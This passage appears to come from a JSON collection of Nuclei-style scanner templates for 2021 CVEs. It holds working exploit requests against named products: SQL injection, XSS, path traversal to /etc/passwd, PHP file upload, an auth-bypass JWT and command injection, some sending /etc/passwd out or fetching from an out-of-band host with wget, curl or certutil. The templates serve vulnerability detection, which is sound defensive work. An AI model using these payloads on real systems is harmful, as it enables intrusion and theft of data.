application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"req-condition":true,"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"CVE-2021-24499\"); ?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["71abe5077dae2754c36d731cc1534d4d"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey<1.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=4"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["curl|CertUtil"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication 